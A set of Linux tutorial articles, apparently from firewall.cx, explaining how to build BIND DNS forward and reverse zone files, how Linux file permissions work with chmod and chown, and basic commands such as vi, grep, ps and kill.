Notice the "IN" class that is present in each section? If we accidentally forget to include it in our zone files, it wouldn't matter because the DNS server will automatically figure out the class from our named.conf file. It's imperative not to forget the "IN" (Internet) class in the named.conf, whereas it really doesnt matter if you don't put it in the zone files. It's good practice still to enter it in the zone files as we did, just to make sure you don't have any problems later on.

And that ends our discussion of the common DNS (BIND) files. Next up is the configuration of our Linux BIND Slave/Secondary DNS server.

 

 


Linux BIND DNS - Part 3: Configuring The db.192.168.0 Zone Data File

The db.192.168.0 zone data file is the second file we need to create and configure for our BIND DNS server. As outlined in the DNS-BIND Introduction, this file's purpose is to provide the IP Address -to- name mappings. Note that this file is to be placed on the Master DNS server for our domain.

Constructing The db.192.168.0 File

While we start to construct the file, you will notice many similarities with our previous file. Most resource records have already been covered and explained in our previous articles, and therefore we will not repeat them on this page.

The first line is our $TTL control statement, followed by the Start Of Authority (SOA) resource record:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour

As you can see, everything above, except the first column of the first line, is identical to the db.firewall.cx file. The "0.168.192.in-addr.arpa" entry is our IP network in reverse order. The trick to figuring out your own in-addr.arpa entry is to simply take your network address, reverse it, and add ".in-addr.arpa." at the end. For example, the 192.168.0.0 network becomes 0.168.192.in-addr.arpa., while a network such as 10.1.5.0 would become 5.1.10.in-addr.arpa.

Name server resource records are next, followed by the PTR resource records that create our IP Address-to-name mappings. The syntax is nearly the same as in the db.domain file, but keep in mind that for the name servers we don't enter the full reversed IP Address, only the first 3 octets, which represent the network they belong to:

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

 Time to look at the configuration file with all its entries:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

This completes the configuration of our db.192.168.0 zone data file.
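Before moving on, it's worth confirming the reverse zone actually works. A minimal check, assuming named is running locally and the dig and named-checkzone utilities (shipped with BIND 9) are available:

named-checkzone 0.168.192.in-addr.arpa /var/named/db.192.168.0
dig @127.0.0.1 -x 192.168.0.15 +short

The second command performs a reverse (PTR) lookup for 192.168.0.15 and should return voyager.firewall.cx.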

Remember, the whole purpose of this file is to provide an IP Address-to-name mapping, which is why we do not use the domain name in front of each line, but the reversed IP Address followed by the in-addr.arpa. entry. The next article deals with the Common Files in Linux BIND DNS.


Linux BIND DNS - Part 2: Configuring db.domain Zone Data File

It's time to start creating our zone files. We'll follow the standard format, which is given in the DNS RFCs, in order to keep everything neat and less confusing.

First step is to decide on the domain we're using and we've decided on the popular firewall.cx. This means that the first zone file will be db.firewall.cx. Note that this file is to be placed on the Master DNS server for our domain.

We will progressively build our database by populating it step by step and explaining each step we take. At the end of the step-by-step example, we'll grab each step's data and put it all together so we can see how the final version of our file will look. We strongly believe this is the best method of explaining how to create a zone file without confusing the hell out of everyone!

Constructing db.firewall.cx - db.domain

It is important at this point to make it clear that we are setting up a primary DNS server. For a simple DNS caching or secondary name server, the setup is a lot simpler and is covered in the articles to come.

The first entry for our file is the Default TTL - Time To Live. This is defined using the $TTL control statement. $TTL specifies the time to live for all records in the file that follow the statement and don't have an explicit TTL. We are going to set ours to 24 hours - 86400 seconds.

The units used are seconds. An older common TTL value for DNS was 86400 seconds, which is 24 hours. A TTL value of 86400 would mean that, if a DNS record was changed on the authoritative nameserver, DNS servers around the world could still be showing the old value from their cache for up to 24 hours after the change.

Newer DNS methods that are part of a DR (Disaster Recovery) system may have some records deliberately set to an extremely low TTL. For example, a 300 second TTL would let key records expire in 5 minutes, helping to ensure these records are flushed worldwide quickly. This gives administrators the ability to edit and update records in a timely manner. TTL values are "per record" and setting this value on specific records is normally honoured automatically by all standard DNS systems worldwide. Dynamic DNS (DDNS) usually has the TTL value set to 5 minutes, or 300 seconds.

Next up is the SOA Record. The SOA (Start Of Authority) resource record indicates that this name server is the best source of information for the data within this zone (this record is required in each db.DOMAIN and db.ADDR file), which is the same as saying this name server is Authoritative for this zone. There can be only one SOA record in every data zone file (db.DOMAIN).

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

Let's explain the above code:

firewall.cx. is the domain name and must always be stated in the first column of our line. Be sure you include the trailing dot "." after the domain name; we'll explain later on why this is needed.

The IN stands for Internet. This is one class of data and, while other classes exist, you'll rarely see them because they are hardly ever used :)

The SOA is an important resource record. What follows is the actual primary name server for firewall.cx. In our example, this is the server named "voyager" and its Fully Qualified Domain Name (FQDN) is voyager.firewall.cx. Notice the trailing "." is present here as well.

Next up is the entry admin.voyager.firewall.cx. which is the email address of the person responsible for this domain. Take the dot "." after the admin entry and replace it with an "@" and you have a valid email address: admin@voyager.firewall.cx. Most times you will see root, postmaster or hostmaster instead of "admin".

The "(" parentheses allow the SOA record to span more than one line, while in most cases the fields that follow are used by the secondary name servers and any other name server requesting information about the domain.

The serial number "1 ; Serial Number" entry is used by the secondary name server to keep track of changes that might have occurred in the master's zone file. When the secondary name server contacts the primary name server, it will check to see if this value is the same. If the secondary's serial number is lower than the primary's, then its data is out of date; when they are equal, the data is up to date. This means that whenever you make any modification to the primary's zone file, you must increment the serial number by at least one.

Note that anything after the semicolon (;) is considered a remark and not taken into consideration by the DNS BIND Service. This allows us to create easy-to-understand comments for future reference.

The refresh "3h ; Refresh after 3 hours" tells the secondary name server how often to check the primary's server's data, to ensure its copy for this zone is up to date.

If the secondary name server tries to contact the primary and fails, the retry value "1h ; Retry after 1 hour" tells the secondary name server how long to wait before it tries to contact the primary again.

If the secondary name server fails to contact the primary for longer than the time specified in the fourth entry "1w ; Expire after 1 week", then the zone data on the secondary name server is considered too old and will expire.

The last line "1h ) ; Negative caching TTL of 1 hour" is how long other name servers will cache negative responses about the zone. These negative responses say that a particular domain, or a type of data sought for a particular domain name, doesn't exist. Notice that the SOA section finishes with the ")" parenthesis.

Next up in the file are the name server (NS) records:

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

These entries define the two name servers (voyager and gateway) for our domain firewall.cx. These entries will also be present in the db.ADDR file for this domain, as we will see later on.

It's time to enter our MX records. These records define the mail exchange servers for our domain, and this is how any client, host or email server is able to find a domain's email server:

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

Let's explain what exactly these entries mean. The first line specifies that voyager.firewall.cx is a mail exchanger for firewall.cx, just as the second line (...IN MX 20 gateway...) specifies that gateway.firewall.cx is also a mail exchanger for the domain. The MX record indicates that the following hosts are mail exchanger servers for the domain and the numbers 10 and 20 indicate the priority level. The smaller the number, the higher the priority.

This means that voyager.firewall.cx is a higher priority mail server than gateway.firewall.cx.  If another server trying to send email to firewall.cx fails to contact the highest priority mail server (voyager.firewall.cx), it will then fall back to the secondary, in which our case is gateway.firewall.cx.

These entries were introduced to prevent mail loops. When another email server (unlikely for a private domain like mine, but the same rule applies to the Internet) wants to send mail to firewall.cx, it will first try to contact the mail exchanger with the smallest number, which in our case is voyager.firewall.cx. The smaller the number, the higher the priority when there is more than one mail server.

In our example, if we replaced:

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

with

firewall.cx. IN MX 50 voyager.firewall.cx.

firewall.cx. IN MX 100 gateway.firewall.cx.

the result, in terms of server priority, would be the same.

Let's now have a look at the next part of our zone file: host IP Addresses and alias records:

; Host addresses defined here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

Most fields in this section are easy to understand. We start by defining our localhost (local loopback) "localhost.firewall.cx. IN A 127.0.0.1" and continue with the servers on our private network, these include voyager, enterprise, gateway and admin. The "A" record stands for IP Address. So "voyager.firewall.cx. IN A 192.168.0.15" translates to a host called voyager located in the firewall.cx domain with an INternet ip Address of 192.168.0.15. See the pattern? :)

The second block has the aliases table, where we created a Canonical Name (CNAME) record. A CNAME record simply maps an alias to its canonical name; in our example, www is the alias and voyager.firewall.cx is the canonical name.

When a name server looks up a name and finds CNAME records, it replaces the name (alias - www) with its canonical name (voyager.firewall.cx) and looks up the canonical name (voyager.firewall.cx).

For example, when a name server looks up www.firewall.cx, it will replace the 'www' with 'voyager' and lookup the IP Address for voyager.firewall.cx.

This also explains the existence of "www" in so many URLs - it's often nothing more than an alias which, ultimately, is replaced with the canonical name defined by the CNAME record.

The Complete db.domain Configuration File

That completes a simple domain setup! We have now created a working zone file that looks like this:

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

; Host Addresses Defined Here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

A quick glance at this file tells you a lot about our lab domain firewall.cx, and this is probably the best time to explain why we should not omit the trailing dot at the end of the domain name:

If we took gateway.firewall.cx as an example and omitted the dot "." at the end of our entries, the system would translate it like this: gateway.firewall.cx.firewall.cx - definitely not what we want!

As you see, the 'firewall.cx' is appended to the end of our Fully Qualified Domain Name for the particular resource record (gateway). This is why it's so important to never forget that extra dot "." at the end!
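With the zone file in place and named (re)loaded, a couple of quick queries against the server will confirm the records resolve as expected; this is a minimal sketch, assuming the dig utility is available and named is running on the local machine:

dig @127.0.0.1 firewall.cx MX +short
dig @127.0.0.1 www.firewall.cx A +short

The first query should list voyager.firewall.cx and gateway.firewall.cx with their priorities (10 and 20), while the second should follow the CNAME and return voyager's IP Address, 192.168.0.15.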

Our next article will cover the db.ADDR file, which will take the name db.192.168.0 in our example.


Linux BIND DNS - Part 1: Introduction To The DNS Database (BIND)

BIND (Berkeley Internet Name Domain) is popular software for translating domain names into IP addresses and is usually found on Linux servers. This article will explain the basic concepts of DNS BIND and analyse the associated files required to successfully set up your own DNS BIND server. After reading this article, you will be able to successfully install and set up a Linux BIND DNS server for your network.

Zones and Domains

The programs that store information about the domain name space are called name servers, as you probably already know. Name Servers generally have complete information about some part of the domain name space (a zone), which they load from a file. The name server is then said to have authority for that zone.

The term zone is not one that you come across every day while surfing the Internet. We tend to think that the domain concept is all there is when it comes to DNS, which makes life easy for us. However, when dealing with the DNS servers that hold data for our domains (name servers), we need to introduce the term zone, since it is essential to understanding how a DNS server is set up.

The difference between a zone and a domain is important, but subtle. The best way to understand the difference is by using a good example, which is coming up next.

The COM domain is divided into many zones, including the hp.com, sun.com and it.com zones. At the top of the domain, there is also a com zone.

The diagram below shows you how a zone fits within a domain:

 dns-bind-intro-1

 

The trick to understanding how it works is to remember that a zone exists "inside" a domain. Name servers load zone files, not domains. Zone files contain information about the portion of a domain for which they are responsible. This could be the whole domain (sun.com, it.com) or simply a portion of it (hp.com + pr.hp.com).

In our example, the hp.com domain has two subdomains, support.hp.com and pr.hp.com. The first one, support.hp.com is controlled by its own name servers as it has its own zone, called the support.hp.com zone. The second one though, pr.hp.com is controlled by the same name server that takes care of the hp.com zone.

The hp.com zone has very little information about the support.hp.com zone; it simply knows it sits right below it. Anyone requiring more information on support.hp.com will be directed to contact the authoritative name servers for that subdomain, which are the name servers for that zone.

So you see that even though support.hp.com is a subdomain just like pr.hp.com, it is not set up and controlled the same way as pr.hp.com.

On the other hand, the sun.com domain has one zone (the sun.com zone) that contains and controls the whole domain. This zone is loaded by the domain's authoritative name servers.

BIND? Never Heard of it!

As mentioned in the beginning of this article, BIND stands for Berkeley Internet Name Domain. Keeping things simple, it's a program you download (www.bind.org) and install on your Unix or Linux server to give it the ability to become a DNS server for your private (LAN) or public (Internet) network.

The majority of DNS servers are based on BIND as it's a proven and reliable DNS server. The download is approximately 4.8 MBytes. Untarring and compiling BIND is a pretty straightforward process and the steps required will depend on your Linux distribution and version. If you follow the instructions provided with the download, you shouldn't have any problems. For simplicity's sake, we assume you've compiled and installed the BIND program using the provided instructions.
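For reference, a typical source build looks something like the sketch below; the archive name is only a placeholder and the exact steps may differ between BIND releases, so always check the README/INSTALL file shipped with the download:

tar -zxvf bind-9.x.x.tar.gz     # unpack the source archive
cd bind-9.x.x
./configure                     # prepare the build for your system
make                            # compile
make install                    # install (run as root)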

Setting Up Your Zone Data

No matter what Linux distribution you have, the file structure is pretty much the same. I have BIND installed on my Linux server, which runs Slackware v8 with kernel 2.4.19. By following the installation procedure found in the documentation provided with BIND, you will have the server installed within 15 min at most.

Once the installation of BIND is complete you need to start creating your zone data files. Remember, these are the files the DNS server will load in order to understand how your domain is setup and the various hosts within it.

A DNS server has multiple files that contain information about the domain setup. Of these files, one will map all host names to IP Addresses and others will map IP Addresses back to hostnames. The name-to-IP Address lookup is sometimes called forward mapping and the IP Address-to-name lookup reverse mapping. Each network will have its own file for reverse mapping.

As a convention in this section, a file that maps hostnames to IP Addresses will be called db.DOMAIN, where DOMAIN is the name of your domain, e.g. db.firewall.cx, and db is short for DataBase. The files mapping IP Addresses to hostnames are called db.ADDR, where ADDR is the network number without trailing zeros or the specification of a netmask, e.g. db.192.168.0 for the 192.168.0.0 network.

The collection of our db.DOMAIN and db.ADDR files are our Zone Data files. There are a few other zone data files, some of which are created during the installation of BIND: named.ca, localhost.zone and named.local.

Named.ca contains information about the root servers on the Internet, should your DNS server need to contact one of them. Localhost.zone and named.local are there to cover the loopback network. The loopback address is a special address hosts use to direct traffic to themselves. This is usually IP Address 127.0.0.1, which belongs to the 127.0.0.0/8 network.

These files must be present in each DNS server and are the same for every DNS server.

Quick Summary of Our Files

Let's have a quick look at the files we have covered so far to make sure we don't lose track:

1) The following files must be created by you and will contain the data for our zone:

  • db.DOMAIN e.g db.space.net - Host to IP Address mapping
  • db.ADDR e.g db.192.168.0 - IP Address to Host mapping

2) The following files are usually created by the BIND installation:

  • named.ca - Contains the ROOT DNS servers
  • named.local & localhost.zone - Special files so the server can direct traffic to itself.

You should also be aware that the file names can change; there is no standard for names, it's just very convenient and tidy to keep to some type of convention.

To tie all the zone data files together a name server needs a configuration file. BIND version 8 and above calls it named.conf and it can be found in your /etc dir once you install the BIND package. Named.conf simply tells the name server where your zone files are located and we will be analysing this file later on.

Most entries in the zone data files are called DNS resource records. Since DNS lookups are case insensitive, you can enter names in your zone data files in uppercase, lowercase or mixed case. I tend to use lowercase.

Resource records must start in the first column of a line. The DNS RFCs have samples that present the order in which one should enter the resource records. Some people choose to follow this order, while others don't. You are not required to follow this order, but I do :)

Here is the order of resource records in the zone data file:

SOA record - Indicates authority for this zone.

NS record - Lists a name server for this zone

MX record - Indicates the mail exchange server for the domain

A record - Name to IP Address mapping (gives the IP Address for a host)

CNAME record - Canonical name (used for aliases)

PTR record - Address to name mapping (used in db.ADDR)

The next article (Part 2) deals with the construction of our first zone data file, db.firewall.cx of our example firewall.cx domain.

 

 


Finding More Information On The Linux Operating System

Since this document merely scratches the surface when it comes to Linux, you will probably find you have lots of questions and possibly problems. Whether these are problems with the operating system, or not knowing the proper way to perform the task in Linux, there is always a place to find help.

On our forums you'll find a lot of experienced people always willing to go that extra mile to help you out, so don't hesitate to ask - you'll be surprised at the responses!

Generally the Linux community is a very helpful one. You'll be happy to know that there is more documentation, tutorials, HOW-TOs and FAQs (Frequently Asked Questions) for Linux than for all other operating systems in the world!

If you go to any search engine, forum or news group researching a problem, you'll always find an answer.

To save you some searching, here are a few websites where you can find information covering most aspects of the operating system:

  • https://tldp.org/ - The Linux Documentation Project homepage has the largest collection of tutorials, HOW-TOs and FAQs for Linux.
  • https://www.linux.org/- The documentation page from the official Linux.org website. Contains links to a lot of useful information.
  • https://forums.justlinux.com/ - Contains a library of information for beginners on all topics from setting up hardware, installing software, to compiling the kernel
  • https://rpm.pbone.net/ - Pbone is a great search engine to find RPM packages for your Linux operating system.
  • https://sourceforge.net/ - The world's largest development and download repository of Open Source code (free) and applications. Sourceforge hosts thousands of open source projects, most of which are of course for the Linux operating system.

We hope you have enjoyed this brief introduction to the Linux operating system and hope you'll be tempted to try Linux for yourself. You've surely got nothing to lose and everything to gain!

Remember, Linux is the No.1 operating system when it comes to web services and mission critical servers - it's not a coincidence other major software vendors are doing everything they can to stop Linux from gaining more ground!

Visit our Linux section to discover more engaging technical articles on the Linux Operating system.


Linux File & Folder Permissions

File & folder security is a big part of any operating system and Linux is no exception!

These permissions allow you to choose exactly who can access your files and folders, providing an overall enhanced security system. This is one of the major weaknesses in the older Windows operating systems where, by default, all users can see each other's files (Windows 95, 98, Me).

For the later, more capable versions of the Windows operating system such as NT, 2000, XP and 2003, things look a lot safer as they fully support file & folder permissions, just as Linux has since the beginning.

Together, we'll now examine a directory listing from our Linux lab server, to help us understand the information provided. While a simple 'ls' will give you the file and directory listing within a given directory, adding the flag '-l' will reveal a number of new fields that we are about to take a look at:

linux-introduction-file-permissions-1

It's possible that most Linux users have seen similar information regarding their files and folders and therefore should feel pretty comfortable with it. If on the other hand you happen to fall in to the group of people who haven't seen such information before, then you either work too much in the GUI interface of Linux, or simply haven't had much experience with the operating system :)

Whatever the case, don't disappear - it's easier than you think!!

Understanding "drwx"

Let's start from scratch, analysing the information in the previous screenshot.

linux-introduction-file-permissions-2

In the yellow column on the right we have the file & directory names (dirlist.txt, document1, document2 etc.) - nothing new here. Next, in the green column, we will find the time and date of creation.

Note that the date and time column will not always display in the format shown. If the file or directory it refers to was created in a year different from the current one, it will then show only the date, month and year, discarding the time of creation.

For example, if the file 'dirlist.txt' was created on the 27th of June, 2004, then the system would show:

Jun 27 2004 dirlist.txt

instead of

Jun 27 11:28 dirlist.txt

A small but important note when examining files and folders! Lastly, the date will change when modifying the file. As such, if we edited a file created last year, then the next time we typed 'ls -l', the file's date information would change to today's date. This is a way you can check to see if files have been modified or tampered with.

The next column (purple) contains the file size in bytes - again nothing special here.

linux-introduction-file-permissions-3

The next column (orange) shows the permissions. Every file in Linux is 'owned' by a particular user; normally this is the user (owner) who created the file, but you can always give ownership to someone else.

The owner might belong to a particular group, in which case this file is also associated with the user's group. In our example, the left column labeled 'User' refers to the actual user that owns the file, while the right column labeled 'group' refers to the group the file belongs to.

Looking at the file named 'dirlist.txt', we can now understand that it belongs to the user named 'root' and group named 'sys'.

Following the permissions is the column with the cyan border in the listing.

The system identifies files by their inode number, which is the unique file system identifier for the file. A directory is actually a listing of inode numbers with their corresponding filenames. Each filename in a directory is a link to a particular inode.

Links let you give a single file more than one name. Therefore, the numbers indicated in the cyan column specifies the number of links to the file.

As it turns out, a directory is actually just a file containing information about link-to-inode associations.

Next up is a very important column, that's the first one on the left containing the '-rwx----w-' characters. These are the actual permissions set for the particular file or directory we are examining.

To make things easier, we've split the permissions section into a further 4 columns as shown above. The first column indicates whether we are talking about a directory (d), file (-) or link (l).

In the newer Linux distributions, the system will usually present the directory name in colour, helping it to stand out from the rest of the files. In the case of a regular file a dash (-) is used, while links use the letter 'l' (lowercase L). For those unfamiliar with links, consider them something similar to Windows shortcuts.

linux-introduction-file-permissions-4

Column 2 refers to the user rights. This is the owner of the file, directory or link and these three characters determine what the owner can do with it.

The 3 characters on column 2 are the permissions for the owner (user rights) of the file or directory. The next 3 are permissions for the group that the file is owned by and the final 3 characters define the access permissions for the others group, that is, everyone else not part of the group.

So, there are 3 possible attributes that make up file access permissions:

  • r - Read permission. Whether the file may be read. In the case of a directory, this would mean the ability to list the contents of the directory.
  • w - Write permission. Whether the file may be written to or modified. For a directory, this defines whether you can make any changes to the contents of the directory. If write permission is not set then you will not be able to delete, rename or create a file.
  • x - Execute permission. Whether the file may be executed. In the case of a directory, this attribute decides whether you have permission to enter, run a search through that directory or execute some program from that directory.

Let's take a look at another example:

linux-introduction-file-permissions-5

Take the permissions of 'red-bulb', which are drwxr-x---. The owner of this directory is user david and the group owner of the directory is sys. The first 3 permission attributes are rwx. These permissions allow full read, write and execute access to the directory to user david. So we conclude that david has full access here.

The group permissions are r-x. Notice there is no write permission given here so while members of the group sys can look at the directory and list its contents, they cannot create new files or sub-directories. They also cannot delete any files or make changes to the directory content in any way.

Lastly, no one else has any access because the access attributes for others are - - -.

If we assume the permissions are drw-r--r-- you see that the owner of the directory (david) can list and make changes to its contents (Read and Write access) but, because there is no execute (x) permission, the user is unable to enter it! You must have read and execute (r-x) in order to enter a directory and list its contents. Members of the group sys have a similar problem, where they seem to be able to read (list) the directory's contents but can't enter it because there is no execute (x) permission given!

Lastly, everyone else can also read (list) the directory but is unable to enter it because of the absence of the execute (x) permission.

Here are some more examples focusing on the permissions:

-r--r--r-- : This means that the owner, group and everyone else have only read permission for the file (remember, if there's no 'd' or 'l', then we are talking about a file).

-rw-rw-rw- : This means that the owner, group and everyone else has read and write permissions.

-rwxrwxrwx : Here, the owner, group and everyone else has full permissions, so they can all read, write and execute the file (-).

Modifying Ownership & Permissions

So how do you change permissions or change the owner of a file?

Changing the owner or group owner of a file is very simple, you just type 'chown user:group filename.ext', where 'user' and 'group' are those to whom you want to give ownership of the file. The 'group' parameter is optional, so if you type 'chown david file.txt', you will give ownership of file.txt to the user named david.

In the case of a directory, nothing much changes as the same command is used. However, because directories usually contain files that also need to be assigned to the new user or group, we use the '-R' flag, which stands for 'recursive' - in other words all subdirectories and their files: 'chown -R user:group dirname'.
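Putting the above together, here are a few typical invocations; the file and directory names are purely illustrative:

chown david file.txt            # make user 'david' the owner of file.txt
chown david:sys file.txt        # set both the owner (david) and the group (sys)
chown -R david:sys projects     # recursively change a directory and everything inside it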

To change permissions you use the 'chmod' command. The possible options here are 'u' for the user, 'g' for the group, 'o' for other, and 'a' for all three. If you don't specify one of these letters it will change to all by default. After this you specify the permissions to add or remove using '+' or '-' . Let's take a look at an example to make it easier to understand:

If we wanted to add read, write and execute to the user of a particular file, we would type the following 'chmod u+rwx file.txt'. If on the other hand you typed 'chmod g-rw file.txt' you will take away read and write permissions of that file for the group .
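A few more symbolic-mode examples along the same lines (the file name is again just an example):

chmod u+rwx file.txt    # owner: add read, write and execute
chmod g-rw file.txt     # group: remove read and write
chmod o+r file.txt      # others: add read
chmod a-x file.txt      # everyone (owner, group and others): remove execute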

While it's not terribly difficult to modify the permissions of a file or directory, remembering all the flags can be hard. Thankfully there's another way, which is less complicated and much faster. By replacing the permissions with numbers, we are able to calculate the required permissions and simply enter the correct sum of various numbers instead of the actual rights.

The way this works is simple. We are aware of three different permissions, Read (r), Write (w) and Execute (x). Each of these permissions is assigned a number as follows:

r (read) - 4

w (write) - 2

x (execute) - 1

Now, to correctly assign a permission, all you need to do is add up the level you want, so if you want someone to have read and write, you get 4+2=6, if you want someone to have just execute, it's just 1.. zero means no permissions. You work out the number for each of the three sections (owner, group and everyone else).

If you want to give read write and execute to the owner and nothing to everyone else, you'd get the number 7 0 0. Starting from the left, the first digit (7) presents the permissions for the owner of the file, the second digit (0) is the permissions for the group, and the last (0) is the permissions for everyone else. You get the 7 by adding read, write and execute permissions according to the numbers assigned to each right as shown in the previous paragraphs: 4+2+1 = 7.

r, w, x Permissions    Calculated Number
---                    0
--x                    1
-w-                    2
-wx                    3 (2+1)
r--                    4
r-x                    5 (4+1)
rw-                    6 (4+2)
rwx                    7 (4+2+1)


If you want to give full access to the owner, only read and execute to the group, and only execute to everyone else, you'd work it out like this :

owner: rwx = 4 + 2 + 1 = 7

group: r-x = 4 + 0 + 1 = 5

everyone: --x = 0 + 0 + 1 = 1

So your number will be 751: 7 for the owner, 5 for the group, and 1 for everyone else. The command will be 'chmod 751 file.txt'. It's simple, isn't it?

If you want to give full control to everyone using all possible combinations, you'd give them all 'rwx' which equals to the number '7', so the final three digit number would be '777':

linux-introduction-file-permissions-6

If on the other hand you decide not to give anyone any permission, you would use '000' (now nobody can access the file, not even you!). However, you can always change the permissions to give yourself read access, by entering 'chmod 400 file.txt'.
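To tie the numeric notation together, here are the examples from this section expressed as commands (file.txt is just a placeholder name):

chmod 751 file.txt    # owner: rwx, group: r-x, others: --x
chmod 777 file.txt    # full read, write and execute for everyone
chmod 000 file.txt    # no permissions for anyone, not even the owner
chmod 400 file.txt    # read-only for the owner, nothing for anyone else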

For more details on the 'chmod' command, please take a look at the man pages.

As we will see soon, the correct combination of user and group permissions will allow us to perform our work while keeping our data safe from the rest of the world.

For example in order for a user or group to enter a directory, they must have at least read (r) and execute (x) permissions on the directory, otherwise access to it is denied:

linux-introduction-file-permissions-7

As seen here, user 'mailman' is trying to access the 'red-bulb' directory which belongs to user 'david' and group 'sys'. Mailman is not a member of the 'sys' group and therefore can't access it. At the same time the folder's permissions allow neither the group nor everyone to access it.

Now, what we did is alter the permission so 'everyone' has at least read and execute permissions so they are able to enter the folder - let's check it out:

linux-introduction-file-permissions-8

Here we see the 'mailman' user successfully entering the 'red-bulb' directory because everyone has read (r) and execute (x) access to it!

The world of Linux permissions is pretty user friendly as long as you see it from the right perspective :) Practice and reviewing the theory will certainly help you remember the most important information so you can perform your work without much trouble.

If you happen to forget something, you can always re-visit us - any time of the day!

Continuing on to our last page, we will provide you with a few links to some of the world's greatest Linux resources, covering Windows to Linux migration, various troubleshooting techniques, forums and much more that will surely be of help.

This completes our initial discussion on the Linux operating system. Visit our Finding More Information page to discover useful resources that will assist you in your Linux journey or visit our Linux section to access more technical articles on the Linux operating system.


Advanced Linux Commands

Now that you're done learning some of the Basic Linux commands and how to use them to install Linux Software, it's time we showed you some of the other ways to work with Linux. Bear in mind that each distribution of Linux (Redhat, SUSE, Mandrake etc) will come with a slightly different GUI (Graphical User Interface) and some of them have done a really good job of creating GUI configuration tools so that you never need to type commands at the command line.

Vi Editor

For example, if you want to edit a text file you can easily use one of the powerful GUI tools like Kate, Kwrite etc., which are all like notepad in Windows though much more powerful; they have features such as multiple file editing and syntax highlighting (if you open an HTML file it understands the HTML tags and highlights them for you). However, you can also use the very powerful vi editor.

When first confronted by vi, most users are totally lost: you open a file in vi (e.g. vi document1) and try to type, but nothing seems to happen - the system just keeps beeping!

Well, that's because vi functions in two modes. One is the command mode, where you can give vi commands such as open a file, exit, split the view, search and replace etc., and the other is the insert mode, where you actually type text!

Don't be put off by the fact that vi doesn't have a pretty GUI interface to go with it, this is an incredibly powerful text editor that would be well worth your time learning... once you're done with it you'll never want to use anything else!
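To give you a feel for the two modes, here is a minimal editing session; the file name is just an example and only the most basic keystrokes are shown:

vi document1        # open (or create) the file - vi starts in command mode
# press 'i' to switch to insert mode and type your text
# press Esc to return to command mode, then type:
#   :wq   to save the file and quit
#   :q!   to quit without saving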


Realising that most people would find vi hard to use straight off, there is a useful little walk-through tutorial that you can access by typing vimtutor at a command line. The tutorial opens vi with the tutorial in it, and you try out each of the commands and shortcuts in vi itself. It's very easy and makes navigating around vi a snap. Check it out.

Grep

Another very useful Linux command is the grep command. This little baby searches for a string in any file. The grep command is frequently used in combination with other commands in order to search for a specific string. For example, if we wanted to check our web server's log file for a specific URL query or IP address, the 'grep' command would do this job just fine.

If, on the other hand, you want to find every occurrence of 'hello world' in every .txt file you have, you would type grep "hello world" *.txt

You'll see some very common command structures later on that utilise 'grep'. At the same time, you can go ahead and check grep's man page by typing man grep , it has a whole lot of very powerful options.

linux-introduction-avd-cmd-line-3

PS - Process ID (PID) display

The ps command will show all the tasks you are currently running on the system, it's the equivalent of Windows Task Manager and you'll be happy to know that there are also GUI versions of 'ps'.

If you're logged in as root in your Linux system and type ps -aux , you'll see all processes running on the system by every user, however, for security purposes, users will only be able to see processes owned by them when typing the same command.

linux-introduction-avd-cmd-line-4

Again, man ps will provide you with a bundle of options available by the command.

Kill

The 'kill' command is complementary to the 'ps' command as it will allow you to terminate a process revealed with the previous command. In cases where a process is not responding, you would use the following syntax to effectively kill it: kill -9 pid where 'pid' is the Process ID (PID) that 'ps' displays for each task.

linux-introduction-avd-cmd-line-5

In the above example, we ran a utility called 'bandwidth' twice which is shown as two different process IDs (7171 & 13344) using the ps command. We then attempted to kill one of them using the command kill -9 7171 . The next time we ran the 'ps', the system reported that a process that was started with the './bandwidth' command had been previously killed.

